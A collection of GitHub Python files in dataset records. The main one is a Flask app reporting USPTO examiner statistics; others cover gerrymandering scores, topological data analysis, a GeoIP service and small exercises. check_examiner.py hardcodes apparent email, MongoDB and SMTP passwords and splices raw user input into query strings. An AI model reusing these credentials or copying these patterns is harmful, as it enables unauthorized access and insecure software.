recommended_month_stat)\r\n response_success_rate = \"%.0f%%\" % (100 * response_success_rate)\r\n\r\n # Here ends the monthly data.\r\n\r\n reporting_text = \"
<br><br>Hi there! The examiner's name is: \"\r\n reporting_text = reporting_text + examiner_name\r\n reporting_text = reporting_text + \"
<br><br>We crunched through \"\r\n reporting_text = reporting_text + str(examiner_apps_we_have)\r\n reporting_text = reporting_text + \" applications for this examiner and here is what we can tell you:<br><br>\"\r\n reporting_text = reporting_text + \"Grant rate (chances to eventually reach a grant): \"\r\n reporting_text = reporting_text + str(examiner_grant_rate) + \" with interview: \" + str(examiner_grant_rate_with_interview) + \" / without interview: \" + str(examiner_grant_rate_without_interview) + \" improvement rate: \" + str(interview_improvement_rate)\r\n reporting_text = reporting_text + \"<br>Response success rate (chances to overcome one office action): \"\r\n reporting_text = reporting_text + str(response_success_rate)\r\n reporting_text = reporting_text + \"
<br><br>
Full monthly stats: \"\r\n months = {}\r\n for i in range (0,13):\r\n if (failed_month[i] !=0):\r\n month_stat[i] = successful_month[i] / (successful_month[i] + failed_month [i])\r\n month_stat[i] = \"%.0f%%\" % (100 * month_stat[i])\r\n if (i !=0):\r\n reporting_text = reporting_text + str(get_month_text(i)) + \": \" + month_stat[i] + \" | \"\r\n months[get_month_text(i)] = month_stat[i]\r\n\r\n #print (reporting_text)\r\n\r\n # Now is the time to check if the office action matches any of our pre-tracked queries\r\n # and if yes, to fire it up.\r\n\r\n # starting from checking if the applicant is in our tracked applicant's list.\r\n\r\n sender_email = \"freshipinsights@gmail.com\"\r\n receiver_email = \"zeev@freship.com\"\r\n password = \"freship14insights\"\r\n\r\n # Create the plain-text and HTML version of your message\r\n text = reporting_text\r\n html = \"\"+reporting_text+\"\"\r\n result = {}\r\n result['examiner_name'] = examiner_name\r\n result['examiner_apps_we_have'] = examiner_apps_we_have\r\n result['examiner_grant_rate'] = examiner_grant_rate\r\n result['examiner_grant_rate_with_interview'] = examiner_grant_rate_with_interview\r\n result['examiner_grant_rate_without_interview'] = examiner_grant_rate_without_interview\r\n result['response_success_rate'] = response_success_rate\r\n result['interview_improvement_rate'] = interview_improvement_rate\r\n result['months'] = months\r\n return (result)\r\n\r\n@app.route('/list_examiners')\r\n@cache.cached(timeout=3600)\r\ndef get_names():\r\n ## Initializing the mongo connection\r\n connection_string = 'mongodb+srv://Zeevtest:Zeevtest@freship-fu97s.mongodb.net/test?retryWrites=true&w=majority'\r\n from bson.decimal128 import Decimal128\r\n from bson.codec_options import TypeCodec\r\n class DecimalCodec(TypeCodec):\r\n python_type = Decimal # the Python type acted upon by this type codec\r\n bson_type = Decimal128 # the BSON type acted upon by this type codec\r\n def transform_python(self, value):\r\n \"\"\"Function that transforms a custom type value into a type\r\n that BSON can encode.\"\"\"\r\n return Decimal128(value)\r\n def transform_bson(self, value):\r\n \"\"\"Function that transforms a vanilla BSON type value into our\r\n custom type.\"\"\"\r\n return value.to_decimal()\r\n decimal_codec = DecimalCodec()\r\n\r\n today = date.today()\r\n cutoff_date = today - timedelta(days=70)\r\n\r\n from bson.codec_options import TypeRegistry\r\n type_registry = TypeRegistry([decimal_codec])\r\n from bson.codec_options import CodecOptions\r\n codec_options = CodecOptions(type_registry=type_registry)\r\n\r\n mongo_client = pymongo.MongoClient(connection_string)\r\n mydb = mongo_client[\"patents\"]\r\n db = mongo_client[\"patents\"]\r\n examiners_collection = mydb.get_collection(\"examiners_new\" , codec_options=codec_options)\r\n return jsonify([(i['examiner']) for i in examiners_collection.find()])\r\n\r\n@app.route('/search_app')\r\ndef search_app():\r\n ## Initializing the mongo connection\r\n import requests\r\n\r\n headers = {\r\n 'Content-type': 'application/json',\r\n }\r\n name = request.args['name']\r\n\r\n data = '{\"searchText\":\"firstNamedApplicant:(' + name + ')\",\"fl\":\"applId patentTitle firstNamedApplicant appExamName \",\"mm\":\"100%\",\"df\":\"patentTitle\",\"qf\":\"firstNamedApplicant \",\"facet\":\"false\",\"sort\":\"applId asc\",\"start\":\"0\"}'\r\n print(data)\r\n return jsonify(list(set([i['firstNamedApplicant'][0] for i in requests.post('https://ped.uspto.gov/api/queries', headers=headers, 
data=data).json()['queryResults']['searchResponse']['response']['docs']])))\r\n\r\n\r\n@app.route('/get_apps')\r\ndef get_apps():\r\n ## Initializing the mongo connection\r\n import requests\r\n\r\n headers = {\r\n 'Content-type': 'application/json',\r\n }\r\n name = request.args['name']\r\n\r\n page = int(request.args.get('page', 0))\r\n\r\n data = '{\"searchText\":\"firstNamedApplicant:(' + name + ')\",\"fl\":\"*\",\"mm\":\"100%\",\"df\":\"patentTitle\",\"qf\":\"firstNamedApplicant \",\"facet\":\"false\",\"sort\":\"applId asc\",\"start\":\"' + str(page * 20) + '\"}'\r\n print(data)\r\n return jsonify(requests.post('https://ped.uspto.gov/api/queries', headers=headers, data=data).json())\r\n\r\n@app.route('/get_apps_by_id')\r\ndef get_apps_by_id():\r\n ## Initializing the mongo connection\r\n import requests\r\n\r\n headers = {\r\n 'Content-type': 'application/json',\r\n }\r\n name = request.args['name']\r\n\r\n page = int(request.args.get('page', 0))\r\n\r\n data = '{\"searchText\":\"applId:(' + name + ')\",\"fl\":\"applId patentTitle firstNamedApplicant appExamName\",\"mm\":\"100%\",\"df\":\"patentTitle\",\"qf\":\"applId\",\"facet\":\"false\",\"sort\":\"applId asc\",\"start\":\"' + str(page * 20) + '\"}'\r\n print(data)\r\n return jsonify(requests.post('https://ped.uspto.gov/api/queries', headers=headers, data=data).json())\r\n\r\n@app.route('/email')\r\ndef send_email():\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n from email.mime.image import MIMEImage\r\n import smtplib\r\n\r\n # create message object instance\r\n msg = MIMEMultipart()\r\n\r\n examiner_name = request.args['name']\r\n email = request.args['email']\r\n resp = hello_world(examiner_name)\r\n message = \"
<br><br>Hi there! The examiner's name is: \" + \"\\n\"\r\n message = message + examiner_name + \"\\n\"\r\n message = message + \"
<br><br>We crunched through \"\r\n message = message + str(resp['examiner_apps_we_have']) + \"\\n\"\r\n message = message + \" applications for this examiner and here is what we can tell you:<br><br>\" + \"\\n\"\r\n message = message + \"Grant rate (chances to eventually reach a grant): \" + \"\\n\"\r\n message = message + str(resp['examiner_grant_rate']) + \" with interview: \" + str(resp['examiner_grant_rate_with_interview']) + \" / without interview: \" + str(resp['examiner_grant_rate_without_interview']) + \" improvement rate: \" + str(resp['interview_improvement_rate'])\r\n message = message + \"<br>Response success rate (chances to overcome one office action): \"\r\n message = message + str(resp['response_success_rate']) + \"\\n\"\r\n objects = resp['months'].keys()\r\n y_pos = np.arange(len(objects))\r\n monto = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\r\n print(y_pos)\r\n performance = [int(resp['months'][month].replace('%', '')) for month in monto]\r\n print(performance)\r\n\r\n plt.bar(y_pos, performance)\r\n plt.xlabel('Month Number')\r\n plt.ylabel('Success percentage rate by month')\r\n plt.legend(loc='upper left')\r\n plt.grid(True, linewidth= 1, linestyle=\"--\")\r\n plt.savefig('temp.png')\r\n fp = open('temp.png', 'rb')\r\n img = MIMEImage(fp.read())\r\n # setup the parameters of the message\r\n password = \"df8hypJVCXscFmNH\"\r\n msg['From'] = \"zeev@freship.com\"\r\n msg['To'] = email\r\n msg['Subject'] = \"Export result for examiner \" + examiner_name\r\n\r\n # add in the message body\r\n msg.attach(MIMEText(message, 'plain'))\r\n img.add_header('Content-ID', '<{}>'.format('temp.png'))\r\n msg.attach(img)\r\n #create server\r\n server = smtplib.SMTP('smtp-relay.sendinblue.com: 587')\r\n\r\n server.starttls()\r\n\r\n # Login Credentials for sending the mail\r\n server.login(msg['From'], password)\r\n\r\n\r\n # send the message via the server.\r\n server.sendmail(msg['From'], msg['To'], msg.as_string())\r\n\r\n server.quit()\r\n\r\n print(\"successfully sent email to %s:\" % (msg['To']))\r\n return \"success\"\r\n\r\n","repo_name":"AlphaPL/CheckExaminer","sub_path":"check_examiner.py","file_name":"check_examiner.py","file_ext":"py","file_size_in_byte":16387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3760754879","text":"import pandas as pd\nfrom pandasql import sqldf\nsql = lambda q: sqldf(q, globals())\nimport numpy as np\nimport seaborn as sns\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n# Importing data\nd = r'/Users/npbuckli/GitHub/gerryscore/gerryscore/Excel work.xlsx'\ndata_raw = pd.read_excel(d,sheet_name='data')\n\n# Filtering out stuff we don't need\ndata = data_raw[(data_raw['year'] == 2016) & (data_raw['special'] == False) & (data_raw['writein'] == False)]\n\n# Seeing the frequency of political parties\npd.crosstab(data['state'],data['party'],margins=True)\ndata['party'].value_counts()\n\n# We only really need R or D so keeping that\ndata = data[(data['party'] == 'democrat') | (data['party'] == 'republican')]\n\n# Cleaning up the dataset because it's got a bunch of variables we don't need\ndata = data[['state','district','party','candidatevotes']]\n\n# Transposing D/R \ndata = pd.pivot_table(data,values='candidatevotes',index=['state','district'],columns='party').reset_index()\n\n# Sorting\ndata = data.sort_values(by=['state','district'])\n\n# Summing votes\ndata = data.fillna(0)\ndata['totalvotes'] = data['democrat'] + data['republican']\n\n# Calculating vote share pct\ndef share(var):\n temp = data.copy()\n temp['{}share'.format(var)] = temp['{}'.format(var)] / temp['totalvotes']\n return temp\ndata = share('democrat')\ndata = share('republican')\n\n\n# Calculating the statistics needed for the mean-median comparison\ndef calc(v1,v2):\n temp = data.copy()\n temp = data.groupby('state').agg({\"{}\".format(v1):{\"{}_mean\".format(v2):np.mean,\"{}_median\".format(v2):np.median,\"{}_std\".format(v2):np.std,\"{}_count\".format(v2):np.size}})\n temp.columns = temp.columns.droplevel(0)\n temp['{}_meanmediandiff'.format(v2)] 
= temp['{}_mean'.format(v2)] - temp['{}_median'.format(v2)]\n temp['{}_ste'.format(v2)] = temp['{}_std'.format(v2)] / (np.sqrt(temp[\"{}_count\".format(v2)]))\n temp['{}_zscore'.format(v2)] = temp['{}_meanmediandiff'.format(v2)] / temp['{}_ste'.format(v2)] + .5808 #<- Correction factor\n return temp\n\ndata1 = calc('democratshare','d')\ndata2 = calc('republicanshare','r')\n\n# Merging on republican z-scores\ndata_summary = pd.merge(data1,data2[['r_zscore']],left_index=True,right_index=True)\ndata_summary = data_summary.dropna(subset=['d_zscore','r_zscore'])\n\n\n# If the democrats were disadvantaged by mean, median difference, we want to take the republican z-score.\n# And vice-versa for the republicans. \n\ndata_summary['final_z'] = data_summary['d_zscore']\nmask = data_summary['d_meanmediandiff'] >0\ndata_summary['final_z'][mask] = data_summary['r_zscore']\n\n# Identifying which party is advantaged\ndata_summary['swing'] = 'Dem'\nmask = data_summary['d_meanmediandiff'] >0 \ndata_summary['swing'][mask] = 'GOP'\n\nmask = data_summary['d_meanmediandiff'] == 0 \ndata_summary['swing'][mask] = 'Neither'\n\ndata_summary = data_summary.reset_index()\n\n# Scaling z-scores so they are easier to understand\n\nscaler = MinMaxScaler()\ndata_summary['Score'] = 1 - (scaler.fit_transform(data_summary[['final_z']]))\n\n# Plotting\ndata_summary = data_summary.sort_values('Score',ascending=False)\nax = sns.barplot(x='Score',y='state',hue='swing',data=data_summary,dodge=False,orient=\"h\")\nax.figure.set_figheight(10)\n\n\n\n","repo_name":"nbucklin/gerryscore","sub_path":"gerryscore.py","file_name":"gerryscore.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16251366375","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 10 09:30:27 2016\n\n\nInstalled Ripser through navigator, using\nhttps://anaconda.org/conda-forge/ripser\nhttps://stackoverflow.com/questions/39299726/cant-find-package-on-anaconda-navigator-what-to-do-next\n\n\ndocumentation for Ripser can be found here\nhttps://ripser.scikit-tda.org/en/latest/reference/stubs/ripser.ripser.html#ripser.ripser\n\n\n@author: downey\n\"\"\"\n\n#%% import modules and set default fonts and colors\n\nimport IPython as IP\nIP.get_ipython().magic('reset -sf')\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as PD\nimport scipy as sp\nfrom scipy import interpolate\nimport pickle\nimport time\nimport re\nimport json as json\nimport pylab\nimport math as math\nfrom pointInside import *\nimport itertools as itertools\nimport ripser as ripser\nimport persim as persim\nimport sklearn as sklearn\nfrom sklearn import datasets\n\n\n# set default fonts and plot colors\nplt.rcParams.update({'image.cmap': 'viridis'})\ncc = plt.rcParams['axes.prop_cycle'].by_key()['color']\nplt.rcParams.update({'font.serif':['Times New Roman', 'Times', 'DejaVu Serif',\n 'Bitstream Vera Serif', 'Computer Modern Roman', 'New Century Schoolbook',\n 'Century Schoolbook L', 'Utopia', 'ITC Bookman', 'Bookman', \n 'Nimbus Roman No9 L', 'Palatino', 'Charter', 'serif']})\nplt.rcParams.update({'font.family':'serif'})\nplt.rcParams.update({'font.size': 10})\nplt.rcParams.update({'mathtext.fontset': 'custom'})\nplt.rcParams.update({'mathtext.rm': 'serif'})\nplt.rcParams.update({'mathtext.it': 'serif:italic'})\nplt.rcParams.update({'mathtext.bf': 'serif:bold'})\nplt.close('all')\n\n#%% Plotting examples I have found and 
like\n\n\n\n#%% Example 1\n\ndata = datasets.make_circles(n_samples=110)[0]\n\nt = np.linspace(0, 5, 100)\nx = np.cos(2*np.pi*t) + t\ndel(data)\ndata = np.vstack((t,x)).T\n\n\nplt.figure()\nplt.scatter(data[:,0],data[:,1])\n\nplt.figure()\nD = ripser.ripser(data)\n\ndgms = D['dgms']\npersim.plot_diagrams(dgms, show = True)\n\n#%% The PersistenceImager() Class from https://persim.scikit-tda.org/en/latest/notebooks/Persistence%20images.html\n\n# Printing a PersistenceImager() object will print its defining attributes\npimgr = persim.PersistenceImager(pixel_size=0.2, birth_range=(0,1))\n\n\n# PersistenceImager() attributes can be adjusted at or after instantiation.\n# Updating attributes of a PersistenceImager() object will automatically update all other dependent attributes.\npimgr.pixel_size = 0.1\npimgr.birth_range = (0, 2)\n\n\n\n# The `fit()` method can be called on one or more (*,2) numpy arrays to automatically determine the minimum birth and\n# persistence ranges needed to capture all persistence pairs. The ranges and resolution are automatically adjusted to\n# accommodate the specified pixel size.\npimgr = persim.PersistenceImager(pixel_size=0.5)\npdgms = [np.array([[0.5, 0.8], [0.7, 2.2], [2.5, 4.0]]),\n np.array([[0.1, 0.2], [3.1, 3.3], [1.6, 2.9]]),\n np.array([[0.2, 1.5], [0.4, 0.6], [0.2, 2.6]])]\npimgr.fit(pdgms, skew=True)\n\n\n# The `transform()` method can then be called on one or more (*,2) numpy arrays to generate persistence images from diagrams.\n# The option `skew=True` specifies that the diagrams are currently in birth-death coordinates and must first be transformed\n# to birth-persistence coordinates.\npimgs = pimgr.transform(pdgms, skew=True)\npimgs[0]\n\n# The `plot_diagram()` and `plot_image()` methods can be used to visualize persistence diagrams and images\nfig, axs = plt.subplots(1, 3, figsize=(10,5))\n\naxs[0].set_title(\"Original Diagram\")\npimgr.plot_diagram(pdgms[0], skew=False, ax=axs[0])\n\naxs[1].set_title(\"Birth-Persistence\\nCoordinates\")\npimgr.plot_diagram(pdgms[0], skew=True, ax=axs[1])\n\naxs[2].set_title(\"Persistence Image\")\npimgr.plot_image(pimgs[0], ax=axs[2])\n\nplt.tight_layout()\n\n\n#%% Generate a persistence diagram using Ripser from https://persim.scikit-tda.org/en/latest/notebooks/Persistence%20images.html\n\n# lots of random noise and 2 circles\ndata = np.concatenate([150 * np.random.random((300,2)),\n 10 + 10 * datasets.make_circles(n_samples=100)[0],\n 100 + 20 * datasets.make_circles(n_samples=100)[0]])\n\ndata = 150 * np.random.random((300,2))\n\nrips = ripser.Rips()\ndgms = rips.fit_transform(data)\nH0_dgm = dgms[0]\nH1_dgm = dgms[1]\n\nplt.figure(figsize=(10,5))\nplt.subplot(121)\nplt.scatter(data[:,0], data[:,1], s=4)\nplt.title(\"Scatter plot of noisy data with some circles\")\n\nplt.subplot(122)\nrips.plot(dgms, legend=False, show=False)\nplt.title(\"Persistence diagram of $H_0$ and $H_1$\")\nplt.show()\n\n# The resolution of the persistence image is adjusted by choosing the pixel size, given in the same units as the diagram\npimgr = persim.PersistenceImager(pixel_size=1)\npimgr.fit(H1_dgm)\n\nfig, axs = plt.subplots(1, 3, figsize=(20,5))\npimgr.plot_diagram(H1_dgm, skew=True, ax=axs[0])\naxs[0].set_title('Diagram', fontsize=16)\n\npimgr.plot_image(pimgr.transform(H1_dgm), ax=axs[1])\naxs[1].set_title('Pixel Size: 1', fontsize=16)\n\npimgr.pixel_size = 0.1\npimgr.plot_image(pimgr.transform(H1_dgm), ax=axs[2])\naxs[2].set_title('Pixel Size: 0.1', 
fontsize=16)\n\nplt.tight_layout()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ARTS-Laboratory/Real-time-Topological-Data-Analysis","sub_path":"Initial_TDA_exploration/v5.2_processing_code.py","file_name":"v5.2_processing_code.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"8588027124","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 11:25:16 2019\n\n@author: ANISHKA\n\"\"\"\n\n# Code Challenge : Pangram\ndef pangram_check():\n string=input(\"Enter the string : \")\n alphabet=\"abcdefghijklmnopqrstuvwxyz\"\n for char in alphabet:\n if (char not in string.lower()):\n return \"Not Pangram\"\n \n return \"Pangram\"\n \n \nprint(pangram_check())\n \n\n\n\n\n ","repo_name":"AnushkaTiwari/FSDP_2019","sub_path":"Day02/pangram.py","file_name":"pangram.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73823741167","text":"import redis\nimport requests\nimport json\n\n\nclass GeoIPApiService:\n def __init__(self, **kwargs):\n self.r = redis.Redis(host='localhost', port=6379, db=0)\n self.geoip_api_username = kwargs['geoIPUsername']\n self.geoip_api_key = kwargs['geoIPApiKey']\n\n def find_data(self, ip: str, use_cache: bool) -> json:\n \"\"\"Finds the data; if use_cache is true, checks the Redis database before calling the API\"\"\"\n if use_cache:\n redis_return = self.r.get(ip)\n if redis_return:\n return redis_return.decode('utf-8')\n else:\n return self.jsonify_api(ip)\n else:\n return self.jsonify_api(ip)\n\n # check that the HTTP response status is OK; raise otherwise\n def jsonify_api(self, ip: str) -> json:\n request = requests.get(f\"https://geolite.info/geoip/v2.1/city/{ip}\",\n auth=(self.geoip_api_username, self.geoip_api_key))\n if request.status_code == requests.codes.ok:\n return request.text\n else:\n request.raise_for_status()\n","repo_name":"eatthoselemons/ip-search-python-challenge","sub_path":"GeoIPApiService.py","file_name":"GeoIPApiService.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11704881795","text":"\"\"\"\n aim: send data by http-body and query-string\n If using a query string to send json data, one problem is the maximum length of the url. Sending json in the http-body\ndoes not have this problem. Also, it is not convenient to construct a dictionary or a list in a query string.\n\"\"\"\n\nimport requests\n\n__url = 'http://127.0.0.1:8000/service/jenkins_build/update'\n__body = {\n 'param1': [1, 2, 3],\n 'param2': {'1': 1, '2': 2},\n}\n__qry = {'job_name': 'jenkins_job', 'build_status': '-1', 'msg4print': \"success build\"}\n# params: query-string\nresp = requests.get(__url, params=__qry, json=__body)\nprint(resp.text)\n\n","repo_name":"hobin2017/Webapp","sub_path":"test_requests/tutorial10.py","file_name":"tutorial10.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72390199087","text":"#The concatenate inputs function is used to merge the relevant text elements into a single text element in order to convert it to tokens. 
\ndef concatenate_inputs(question, conversation_history, context, response):\n ##To determine the relevant tokens excluding the prompt template we take the following elements:\n # question - Question submitted by the user in the chat interface\n # conversation_history - The conversational history passed to the model as context\n # context - The reference answer passed to the model to help generate an adequate response to the question\n \n # The combined_text variable is initialized simply as the question\n combined_text = question\n\n # We now start adding the conversational history to the initialized \"combined_text\"\n # The conversation history variable is a list of lists. Each outer list item corresponds to one conversational turn\n for exchange in conversation_history:\n # We iterate through the conversation_history, working through each element as the variable \"exchange\"\n # Each conversational turn (list item named exchange in this case) consists of two strings (text elements), \n # the first one, exchange[0], corresponds to the user's submitted question, the second element, exchange[1], \n # corresponds to the bot's response.\n # For each conversational turn we extend the combined text by a space, the user question, a space, the bot response\n combined_text = combined_text + \" \" + exchange[0] + \" \" + exchange[1]\n\n # We now take the combined text, which at this point consists of the original user question and the elements of the conversational \n # history, and add another space as well as the context used to answer the question which is taken from the QA database provided\n combined_text += \" \" + context\n\n return combined_text\n\n# The count total tokens function takes the individual text elements as an input, merges them into a single text element using the \n# concatenate_inputs function. This merged text is then tokenized using the tiktoken package provided by OpenAI (https://github.com/openai/tiktoken)\n# after which we count the number of tokens that the text was converted to using the built-in len() function provided by Python.\ndef count_total_tokens(question, conversation_history, context, response):\n import tiktoken\n\n # Here we load the encoding model (tokenizer) that is used to convert text into tokens prior to being processed by the Large Language Model. \n encoder = tiktoken.encoding_for_model(\"gpt-3.5-turbo\")\n \n # Here we pass the individual elements to the function we have defined that allows us to merge all textual elements\n # into a single text element named prompt\n prompt = concatenate_inputs(question, conversation_history, context, response)\n\n # We now generate the encoding from our original text using the previously defined encoder by passing our \n # prompt text to it\n encoding = encoder.encode(prompt)\n \n # We now determine the length (number of elements) that make up our encoding using Python's built-in len() function\n total_tokens = len(encoding)\n \n # Here we return the number of tokens that we calculated for storage in the database. 
\n return total_tokens\n","repo_name":"kkotsche1/counting-tokens-SoftCann","sub_path":"token_counter.py","file_name":"token_counter.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1603649167","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n Bind the button events and the intermediate logic.\n\"\"\"\n\nfrom PyQt5 import QtGui,QtCore, QtWidgets\nfrom Ui_MplMainWindow import Ui_MainWindow\nfrom mplCanvasWrapper import MplCanvasWrapper\nfrom historyShowWrapper import HistoryShowWrapper\nimport sys\n\nclass Code_MainWindow(Ui_MainWindow):#changed to inherit from Ui_MainWindow\n def __init__(self, parent = None): \n super(Code_MainWindow, self).__init__(parent)\n self.setupUi(self)\n self.startBtn.clicked.connect(self.startPlot)\n self.stopBtn.clicked.connect(self.stopPlot)\n \n def startPlot(self):\n self.func = self.funcComboBox.currentIndex()\n if self.func == 0:\n self.mplCanvas = MplCanvasWrapper(self.centralwidget)\n elif self.func == 1:\n self.mplCanvas = HistoryShowWrapper(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.mplCanvas.sizePolicy().hasHeightForWidth())\n self.mplCanvas.setSizePolicy(sizePolicy)\n self.mplCanvas.setObjectName(\"mplCanvas\")\n self.gridLayout.addWidget(self.mplCanvas, 1, 0, 1, 1)\n \n code = self.codeLineEdit.text()\n self.mplCanvas.startPlot(code)\n pass\n \n def stopPlot(self):\n ''' pause plot '''\n self.mplCanvas.pausePlot()\n pass\n \n def releasePlot(self):\n ''' stop and release thread'''\n self.mplCanvas.releasePlot()\n \n def closeEvent(self,event):\n result =QtWidgets.QMessageBox.question(self,\n \"Confirm Exit...\",\n \"Are you sure you want to exit ?\",\n QtWidgets.QMessageBox.Yes|QtWidgets.QMessageBox.No)\n event.ignore()\n if result ==QtWidgets.QMessageBox.Yes:\n self.releasePlot()#release thread's resource\n event.accept()\n \nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv) \n ui = Code_MainWindow() \n ui.show() \n sys.exit(app.exec_())","repo_name":"ccyuki/tradeShow","sub_path":"Code_MplMainWindow.py","file_name":"Code_MplMainWindow.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74718069165","text":"class Solution:\n def matrixBlockSum(self, mat: List[List[int]], k: int) -> List[List[int]]:\n res = []\n #Build pref sum matrix\n for i in range(len(mat)):\n for j in range(len(mat[i])):\n prev_row_val = 0 if i-1 < 0 else mat[i-1][j]\n prev_col_val = 0 if j-1 < 0 else mat[i][j-1]\n prev_diag_val = mat[i-1][j-1] if (i-1 >= 0 and j-1 >= 0) else 0\n\n mat[i][j] += ((prev_row_val+prev_col_val)-prev_diag_val)\n\n #Calculate result\n for i in range(len(mat)):\n res.append([])\n for j in range(len(mat[i])):\n top_row = max(0,i-k-1)\n bottom_row = min(len(mat)-1,i+k)\n left_col = max(0,j-k-1)\n right_col = min(len(mat[i])-1,j+k)\n\n total = mat[bottom_row][right_col]\n left_total = mat[bottom_row][left_col] if j-k-1 >= 0 else 0\n top_total = mat[top_row][right_col] if i-k-1 >= 0 else 0\n diag_total = mat[top_row][left_col] if ((i-k-1) >= 0 and (j-k-1) >=0) else 0\n\n res[-1].append((total-left_total-top_total)+diag_total) \n\n return 
res","repo_name":"rebecca759/Competitive_Programming","sub_path":"DailyQuestions/matrix_block_sum.py","file_name":"matrix_block_sum.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"22677305720","text":"from __future__ import division\n\nimport re\n\nimport numpy as np\nimport uncertainties\nfrom past.utils import old_div\n\nfrom threeML.io.logging import setup_logger\n\nlog = setup_logger(__name__)\n\n\ndef interval_to_errors(value, low_bound, hi_bound):\n \"\"\"\n Convert error intervals to errors\n\n :param value: central value \n :param low_bound: interval low bound\n :param hi_bound: interval high bound\n :return: (error minus, error plus)\n \"\"\"\n\n error_plus = hi_bound - value\n error_minus = value - low_bound\n\n return error_minus, error_plus\n\n\ndef get_uncertainty_tokens(x):\n \"\"\"\n Split the given uncertainty in number, error and exponent.\n\n :param x: an uncertainty instance\n :return: number, error and exponent\n \"\"\"\n\n this_str = x.__str__()\n\n is_inf = False\n \n if \"inf\" in this_str:\n is_inf = True\n\n\n this_str = this_str.replace(\"inf\", \"nan\")\n \n \n try:\n\n number, uncertainty, exponent = re.match(\n \"\\(?(\\-?[0-9]+\\.?[0-9]*) ([0-9]+\\.?[0-9]*)\\)?(e[\\+|\\-][0-9]+)?\",\n this_str.replace(\"+/-\", \" \").replace(\"nan\", \"0\"),\n ).groups()\n\n except:\n\n log.error(\n f\"Could not extract number, uncertainty and exponent from {x.__str__()}. This is likely a bug.\")\n\n raise RuntimeError()\n\n if is_inf:\n\n uncertainty = \"inf\"\n\n \n return number, uncertainty, exponent\n\n\ndef _order_of_magnitude(value):\n\n return 10 ** np.floor(np.log10(abs(value)))\n\n\ndef uncertainty_formatter(value, low_bound, hi_bound):\n \"\"\"\n Gets a value and its error in input, and returns the value, the uncertainty and the common exponent with the proper\n number of significant digits in a string like (4.2 -0.023 +5.23) x 10^5\n\n :param value:\n :param error: a *positive* value\n :return: string representation of interval\n \"\"\"\n\n # Get the errors (instead of the boundaries)\n\n error_m, error_p = interval_to_errors(value, low_bound, hi_bound)\n\n error_p_is_nan = False\n error_m_is_nan = False\n\n if not np.isfinite(error_p):\n\n log.warning(f\"the positive uncertainty is not finite \")\n\n error_p_is_nan = True\n\n if not np.isfinite(error_m):\n\n log.warning(f\"the negative uncertainty is not finite \")\n\n error_m_is_nan = True\n\n # Compute the sign of the errors\n # NOTE: sometimes value is not within low_bound - hi_bound, so these sign might not always\n # be -1 and +1 respectively\n\n sign_m = _sign(low_bound - value)\n sign_p = _sign(hi_bound - value)\n\n # Scale the values to the order of magnitude of the value\n\n tmp = [_order_of_magnitude(value)]\n\n if not error_m_is_nan:\n\n tmp.append(_order_of_magnitude(error_m))\n\n if not error_p_is_nan:\n\n tmp.append(_order_of_magnitude(error_p))\n\n order_of_magnitude = max(tmp)\n\n scaled_value = old_div(value, order_of_magnitude)\n scaled_error_m = old_div(error_m, order_of_magnitude)\n scaled_error_p = old_div(error_p, order_of_magnitude)\n\n # Get the uncertainties instance of the scaled values/errors\n\n x = uncertainties.ufloat(scaled_value, abs(scaled_error_m))\n\n # Split the uncertainty in number, negative error, and exponent (if any)\n\n num1, unc1, exponent1 = get_uncertainty_tokens(x)\n\n # Repeat the same for the other error\n\n y = uncertainties.ufloat(scaled_value, 
